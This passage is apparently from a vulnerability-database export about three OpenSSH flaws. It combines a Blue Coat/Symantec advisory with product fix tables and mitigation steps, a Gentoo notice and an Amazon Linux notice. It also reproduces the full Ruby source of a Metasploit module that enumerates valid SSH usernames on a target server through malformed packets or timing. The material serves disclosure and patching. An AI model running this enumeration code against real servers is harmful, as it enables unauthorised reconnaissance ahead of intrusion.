Upgrade to 6.1.23.1. \n \n \n\n**Malware Analysis Appliance (MAA)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-6210, CVE-2016-6515 | 4.2 | Upgrade to 4.2.10. \nCVE-2016-8858 | 4.2 | See Mitigation section for workaround instructions. \n \n \n\n**Norman Shark Industrial Control System Protection (ICSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-6210, CVE-2016-6515 | 5.4 | Not vulnerable, fixed in 5.4.1 \n5.3 | Upgrade to a later release with fixes. \nCVE-2016-8858 | 5.3, 5.4 | Not available at this time \n \n \n\n**Norman Shark Network Protection (NNP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 5.3 | A fix will not be provided. \n \n \n\n**Norman Shark SCADA Protection (NSP)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 5.3 | A fix will not be provided. Customers who use NSP for USB cleaning can switch to a version of ICSP with fixes. \n \n \n\n**PacketShaper (PS)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-8858 | 9.2 (only affects other SSH management connections) | Not vulnerable, fixed in 9.2.13p7 \n \n \n\n**ProxySG** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-8858 | 6.7 and later | Not vulnerable, fixed in 6.7.1.1 \n6.6 | Upgrade to 6.6.5.4. \n6.5 | Upgrade to 6.5.10.1. \n \n \n\n**SSL Visibility (SSLV)** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 3.12 and later | Not vulnerable, fixed in 3.12.1.1 \nCVE-2016-6210, CVE-2016-6515 | 3.11 | Not vulnerable, fixed in 3.11.1.1 \n3.10 | Not vulnerable, fixed in 3.10.1.1 \n3.9 | Upgrade to 3.9.6.1. \n3.8.4FC | Upgrade to a later release with fixes. \nCVE-2016-8858 | 3.11 | Upgrade to 3.11.2.1. \n3.10.3.1 | Upgrade to 3.10.3.1. \n3.9 | Upgrade to a later release with fixes. \n3.8.4FC | Upgrade to a later release with fixes. \n \n \n\nWeb Isolation (WI) \n--- \n**CVE** | **Supported Version(s)** | **Remediation** \nCVE-2016-8858 | 1.13, 1.14 | Not available at this time \n1.12 | Upgrade to a later release with fixes. \n \n \n\n**X-Series XOS** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nCVE-2016-6210, CVE-2016-6515 | 9.7, 10.0, 11.0 (only APM software) | A fix will not be provided. \n \n### \nADDITIONAL PRODUCT INFORMATION \n\nBlue Coat products do not enable or use all functionality within OpenSSH. The products listed below do not utilize the functionality described in the CVEs below and are thus not known to be vulnerable to them. However, fixes for these CVEs will be included in the patches that are provided.\n\n * **PacketShaper:** CVE-2016-6210 and CVE-2016-6515\n\nThe following products are not vulnerable: \n**Android Mobile Agent \nAuthConnector \nBCAAA \nBlue Coat HSM Agent for the Luna SP \nClient Connector \nCloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Field Service Cloud \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nContent Analysis System \nGeneral Auth Connector Login Application \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \nMail Threat Defense \nManagement Center \nPacketShaper S-Series \nPolicyCenter \nPolicyCenter S-Series \nProxyAV \nProxyAV ConLog and ConLogXP \nProxyClient \nReporter \nSecurity Analytics \nUnified Agent**\n\nBlue Coat no longer provides vulnerability information for the following products:\n\n**DLP** \nPlease, contact Digital Guardian technical support regarding vulnerability information for DLP. \n \n\n\n### ISSUES\n\n**CVE-2016-6210** \n--- \n**Severity / CVSSv2** | Medium / 4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N) \n**References** | SecurityFocus: [BID 91812](<https://www.securityfocus.com/bid/91812>) / NVD: [CVE-2016-6210](<https://nvd.nist.gov/vuln/detail/CVE-2016-6210>) \n**Impact** | Information disclosure \n**Description** | A timing difference between password authentication of existing and non-existing user accounts allows a remote attacker to make authentication attempts with large passwords and enumerate the existing user accounts on the target system. \n \n \n\n**CVE-2016-6515** \n--- \n**Severity / CVSSv2** | High / 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C) \n**References** | SecurityFocus: [BID 92212](<https://www.securityfocus.com/bid/92212>) / NVD: [CVE-2016-6515](<https://nvd.nist.gov/vuln/detail/CVE-2016-6515>) \n**Impact** | Denial of service \n**Description** | An insufficient input validation flaw in password authentication allows a remote attacker to send a long password string and cause excessive CPU consumption, resulting in denial of service. \n \n \n\n**CVE-2016-8858** \n--- \n**Severity / CVSSv2** | High / 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C) \n**References** | SecurityFocus: [BID 93776](<https://www.securityfocus.com/bid/93776>) / NVD: [CVE-2016-8858](<https://nvd.nist.gov/vuln/detail/CVE-2016-8858>) \n**Impact** | Denial of service \n**Description** | A flaw in message handling allows a remote attacker to repeatedly send the KEXINIT SSH message and cause memory exhaustion, resulting in denial of service. \n \n \n\n### MITIGATION \n\nThese vulnerabilities can be exploited only through the management interfaces for all vulnerable products. Allowing only machines, IP addresses and subnets from a trusted network to access the management interface reduces the threat of exploiting the vulnerabilities.\n\nCVE-2016-8858 can be remediated in Malware Analysis by limiting the maximum number of concurrent unauthenticated connections to the SSH daemon. Customers should use the following steps in the management CLI:\n\n 1. Create a backup copy of the SSH daemon configuration file: cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak\n 2. Add the line \"MaxStartups 5:100:5\" to /etc/ssh/sshd_config\n 3. Restart SSH daemon: service ssh restart \n \n\n\n### REVISION\n\n2021-01-15 WI 1.14 is vulnerable to CVE-2016-8858. A fix is not available at this time. Fixes will not be provided for WI 1.12. Please upgrade to a later release with the vulnerability fixes. \n2020-11-17 A fix for XOS 9.7, 10.0, and 11.0 will not be provided. \n2020-04-29 A fix will not be provided for ICSP. Please upgrade to a later release with the vulnerability fixes. \n2019-10-07 WI 1.12 and 1.13 are vulnerable to CVE-2016-8858. A fix is not available at this time. Fixes will not be provided for SSLV 3.8.4fc and XOS 9.7. Please upgrade to a later release with the vulnerability fixes. \n2019-01-21 ICSP 5.4 is not vulnerable to CVE-2016-6210 and CVE-2016-6515 because a fix is available in 5.4.1. \n2018-09-24 A fix for SSLV 3.8.4FC will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-08-03 Customers who use NSP for USB cleaning can switch to a version of Industrial Control System Protection (ICSP) with fixes. \n2018-07-30 See Mitigation section for workaround instructions for CVE-2016-8858 in MA 4.2. \n2018-07-01 A fix for PacketShaper 9.2 is available in 9.2.13p7. \n2018-06-29 A fix for Norman Shark Network Protection (NNP) 5.3 and Norman Shark SCADA Protection (NSP) 5.3 will not be provided. \n2018-04-25 A fix for XOS 9.7 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2018-04-06 A fix for CVE-2016-6210 and CVE-2016-6515 in SSLV 3.9 is available in 3.9.6.1 \n2017-11-16 A fix for SSLV 3.9 will not be provided. Please upgrade to a later version with the vulnerability fixes. \n2017-11-15 SSLV 3.12 is not vulnerable because a fix is available in 3.12.1.1. \n2017-11-06 ASG 6.7 is not vulnerable because a fix is available in 6.7.2.1. \n2017-08-15 A fix for CVE-2016-8858 in SSLV 3.10 is available in 3.10.3.1. \n2017-08-02 SSLV 4.1 is not vulnerable. \n2017-04-30 A fix for Director 6.1 is available in 6.1.23.1. \n2017-04-29 A fix for CacheFlow 3.4 is available in 3.4.2.8. \n2017-04-26 Added CVSS v2 score for CVE-2016-6210 and base score for Security Advisory. \n2017-03-29 It was previously reported that ASG 6.6 is not vulnerable to CVE-2016-8858. Further investigation has shown that ASG 6.6 is vulnerable to CVE-2016-8858. A fix is available in 6.6.5.4. \n2017-03-29 A fix for ProxySG 6.6 is available in 6.6.5.4. \n2017-03-08 A fix for ProxySG 6.5 is available in 6.5.10.1. \n2017-03-08 ProxySG 6.7 is not vulnerable because a fix is available in 6.7.1.1. SSLV 4.0 is not vulnerable. \n2016-01-25 SSLV 3.11.2.1 remediates CVE-2016-8858 by restricting the number of concurrent unauthenticated incoming SSH connections. \n2016-12-13 initial public release \n2016-01-20 It was previously reported that ASG, CAS, MTD, MC, PacketShaper S-Series, PolicyCenter S-Series, Reporter 10.1, Security Analytics, and XOS are vulnerable to CVE-2016-8858. Further investigation has shows that these products are not vulnerable.\n", "modified": "2021-01-15T20:16:28", "published": "2016-12-13T08:00:00", "id": "SMNTC-1390", "href": "", "type": "symantec", "title": "SA136 : OpenSSH Vulnerabilities", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "metasploit": [{"lastseen": "2020-07-15T20:40:44", "description": "This module uses a malformed packet or timing attack to enumerate users on an OpenSSH server. The default action sends a malformed (corrupted) SSH_MSG_USERAUTH_REQUEST packet using public key authentication (must be enabled) to enumerate users. On some versions of OpenSSH under some configurations, OpenSSH will return a \"permission denied\" error for an invalid user faster than for a valid user, creating an opportunity for a timing attack to enumerate users. Testing note: invalid users were logged, while valid users were not. YMMV.\n", "published": "2014-04-28T18:47:15", "type": "metasploit", "title": "SSH Username Enumeration", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0190", "CVE-2006-5229", "CVE-2016-6210", "CVE-2018-15473"], "modified": "2018-09-15T23:54:45", "id": "MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SSH\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SSH Username Enumeration',\n 'Description' => %q{\n This module uses a malformed packet or timing attack to enumerate users on\n an OpenSSH server.\n\n The default action sends a malformed (corrupted) SSH_MSG_USERAUTH_REQUEST\n packet using public key authentication (must be enabled) to enumerate users.\n\n On some versions of OpenSSH under some configurations, OpenSSH will return a\n \"permission denied\" error for an invalid user faster than for a valid user,\n creating an opportunity for a timing attack to enumerate users.\n\n Testing note: invalid users were logged, while valid users were not. YMMV.\n },\n 'Author' => [\n 'kenkeiras', # Timing attack\n 'Dariusz Tytko', # Malformed packet\n 'Michal Sajdak', # Malformed packet\n 'Qualys', # Malformed packet\n 'wvu' # Malformed packet\n ],\n 'References' => [\n ['CVE', '2003-0190'],\n ['CVE', '2006-5229'],\n ['CVE', '2016-6210'],\n ['CVE', '2018-15473'],\n ['OSVDB', '32721'],\n ['BID', '20418'],\n ['URL', 'https://seclists.org/oss-sec/2018/q3/124'],\n ['URL', 'https://sekurak.pl/openssh-users-enumeration-cve-2018-15473/']\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Malformed Packet',\n 'Description' => 'Use a malformed packet',\n 'Type' => :malformed_packet\n ],\n ['Timing Attack',\n 'Description' => 'Use a timing attack',\n 'Type' => :timing_attack\n ]\n ],\n 'DefaultAction' => 'Malformed Packet'\n ))\n\n register_options(\n [\n Opt::Proxies,\n Opt::RPORT(22),\n OptString.new('USERNAME',\n [false, 'Single username to test (username spray)']),\n OptPath.new('USER_FILE',\n [false, 'File containing usernames, one per line']),\n OptInt.new('THRESHOLD',\n [true,\n 'Amount of seconds needed before a user is considered ' \\\n 'found (timing attack only)', 10]),\n OptBool.new('CHECK_FALSE',\n [false, 'Check for false positives (random username)', false])\n ]\n )\n\n register_advanced_options(\n [\n OptInt.new('RETRY_NUM',\n [true , 'The number of attempts to connect to a SSH server' \\\n ' for each user', 3]),\n OptInt.new('SSH_TIMEOUT',\n [false, 'Specify the maximum time to negotiate a SSH session',\n 10]),\n OptBool.new('SSH_DEBUG',\n [false, 'Enable SSH debugging output (Extreme verbosity!)',\n false])\n ]\n )\n end\n\n def rport\n datastore['RPORT']\n end\n\n def retry_num\n datastore['RETRY_NUM']\n end\n\n def threshold\n datastore['THRESHOLD']\n end\n\n # Returns true if a nonsense username appears active.\n def check_false_positive(ip)\n user = Rex::Text.rand_text_alphanumeric(8..32)\n attempt_user(user, ip) == :success\n end\n\n def check_user(ip, user, port)\n technique = action['Type']\n\n opts = {\n :port => port,\n :use_agent => false,\n :config => false,\n :proxy => ssh_socket_factory,\n :non_interactive => true,\n :verify_host_key => :never\n }\n\n # The auth method is converted into a class name for instantiation,\n # so malformed-packet here becomes MalformedPacket from the mixin\n case technique\n when :malformed_packet\n opts.merge!(:auth_methods => ['malformed-packet'])\n when :timing_attack\n opts.merge!(\n :auth_methods => ['password', 'keyboard-interactive'],\n :password => rand_pass\n )\n end\n\n opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']\n\n start_time = Time.new\n\n begin\n ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do\n Net::SSH.start(ip, user, opts)\n end\n rescue Rex::ConnectionError\n return :connection_error\n rescue Timeout::Error\n return :success if technique == :timing_attack\n rescue Net::SSH::AuthenticationFailed\n return :fail if technique == :malformed_packet\n rescue Net::SSH::Exception => e\n vprint_error(\"#{e.class}: #{e.message}\")\n end\n\n finish_time = Time.new\n\n case technique\n when :malformed_packet\n return :success if ssh\n when :timing_attack\n return :success if (finish_time - start_time > threshold)\n end\n\n :fail\n end\n\n def rand_pass\n Rex::Text.rand_text_english(64_000..65_000)\n end\n\n def do_report(ip, user, port)\n service_data = {\n address: ip,\n port: rport,\n service_name: 'ssh',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: fullname,\n username: user,\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED,\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n # Because this isn't using the AuthBrute mixin, we don't have the\n # usual peer method\n def peer(rhost=nil)\n \"#{rhost}:#{rport} - SSH -\"\n end\n\n def user_list\n users = []\n\n if datastore['USERNAME']\n users << datastore['USERNAME']\n elsif datastore['USER_FILE'] && File.readable?(datastore['USER_FILE'])\n users += File.read(datastore['USER_FILE']).split\n end\n\n users\n end\n\n def attempt_user(user, ip)\n attempt_num = 0\n ret = nil\n\n while attempt_num <= retry_num and (ret.nil? or ret == :connection_error)\n if attempt_num > 0\n Rex.sleep(2 ** attempt_num)\n vprint_status(\"#{peer(ip)} Retrying '#{user}' due to connection error\")\n end\n\n ret = check_user(ip, user, rport)\n attempt_num += 1\n end\n\n ret\n end\n\n def show_result(attempt_result, user, ip)\n case attempt_result\n when :success\n print_good(\"#{peer(ip)} User '#{user}' found\")\n do_report(ip, user, rport)\n when :connection_error\n print_error(\"#{peer(ip)} User '#{user}' on could not connect\")\n when :fail\n print_error(\"#{peer(ip)} User '#{user}' not found\")\n end\n end\n\n def run_host(ip)\n print_status(\"#{peer(ip)} Using #{action.name.downcase} technique\")\n\n if datastore['CHECK_FALSE']\n print_status(\"#{peer(ip)} Checking for false positives\")\n if check_false_positive(ip)\n print_error(\"#{peer(ip)} throws false positive results. Aborting.\")\n return\n end\n end\n\n users = user_list\n\n if users.empty?\n print_error('Please populate USERNAME or USER_FILE')\n return\n end\n\n print_status(\"#{peer(ip)} Starting scan\")\n users.each { |user| show_result(attempt_user(user, ip), user, ip) }\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ssh/ssh_enumusers.rb"}], "gentoo": [{"lastseen": "2016-12-07T12:54:24", "bulletinFamily": "unix", "cvelist": ["CVE-2016-1908", "CVE-2015-8325", "CVE-2016-3115", "CVE-2016-6210", "CVE-2016-8858"], "edition": 1, "description": "### Background\n\nOpenSSH is a complete SSH protocol implementation that includes SFTP client and server support. \n\n### Description\n\nMultiple vulnerabilities have been discovered in OpenSSH. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nRemote attackers could cause Denial of Service and conduct user enumeration. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll OpenSSH users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/openssh-7.3_p1-r7\"", "modified": "2016-12-07T00:00:00", "published": "2016-12-07T00:00:00", "href": "https://security.gentoo.org/glsa/201612-18", "id": "GLSA-201612-18", "type": "gentoo", "title": "OpenSSH: Multiple vulnerabilities", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2020-11-10T12:36:10", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "description": "**Issue Overview:**\n\nA covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. ([CVE-2016-6210 __](<https://access.redhat.com/security/cve/CVE-2016-6210>))\n\nIt was found that OpenSSH did not limit password lengths for password authentication. A remote unauthenticated attacker could use this flaw to temporarily trigger high CPU consumption in sshd by sending long passwords. ([CVE-2016-6515 __](<https://access.redhat.com/security/cve/CVE-2016-6515>))\n\nIt was found that ssh-agent could load PKCS#11 modules from arbitrary paths. An attacker having control of the forwarded agent-socket on the server, and the ability to write to the filesystem of the client host, could use this flaw to execute arbitrary code with the privileges of the user running ssh-agent. ([CVE-2016-10009 __](<https://access.redhat.com/security/cve/CVE-2016-10009>))\n\nIt was found that the host private key material could possibly leak to the privilege-separated child processes via re-allocated memory. An attacker able to compromise the privilege-separated process could therefore obtain the leaked key information. ([CVE-2016-10011 __](<https://access.redhat.com/security/cve/CVE-2016-10011>))\n\nIt was found that the boundary checks in the code implementing support for pre-authentication compression could have been optimized out by certain compilers. An attacker able to compromise the privilege-separated process could possibly use this flaw for further attacks against the privileged monitor process. ([CVE-2016-10012 __](<https://access.redhat.com/security/cve/CVE-2016-10012>))\n\n \n**Affected Packages:** \n\n\nopenssh\n\n \n**Issue Correction:** \nRun _yum update openssh_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n openssh-ldap-7.4p1-11.68.amzn1.i686 \n pam_ssh_agent_auth-0.10.3-1.11.68.amzn1.i686 \n openssh-cavs-7.4p1-11.68.amzn1.i686 \n openssh-7.4p1-11.68.amzn1.i686 \n openssh-debuginfo-7.4p1-11.68.amzn1.i686 \n openssh-keycat-7.4p1-11.68.amzn1.i686 \n openssh-server-7.4p1-11.68.amzn1.i686 \n openssh-clients-7.4p1-11.68.amzn1.i686 \n \n src: \n openssh-7.4p1-11.68.amzn1.src \n \n x86_64: \n openssh-ldap-7.4p1-11.68.amzn1.x86_64 \n openssh-server-7.4p1-11.68.amzn1.x86_64 \n openssh-7.4p1-11.68.amzn1.x86_64 \n openssh-keycat-7.4p1-11.68.amzn1.x86_64 \n pam_ssh_agent_auth-0.10.3-1.11.68.amzn1.x86_64 \n openssh-cavs-7.4p1-11.68.amzn1.x86_64 \n openssh-debuginfo-7.4p1-11.68.amzn1.x86_64 \n openssh-clients-7.4p1-11.68.amzn1.x86_64 \n \n \n", "edition": 3, "modified": "2017-10-03T11:00:00", "published": "2017-10-03T11:00:00", "id": "ALAS-2017-898", "href": "https://alas.aws.amazon.com/ALAS-2017-898.html", "title": "Medium: openssh", "type": "amazon", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}]}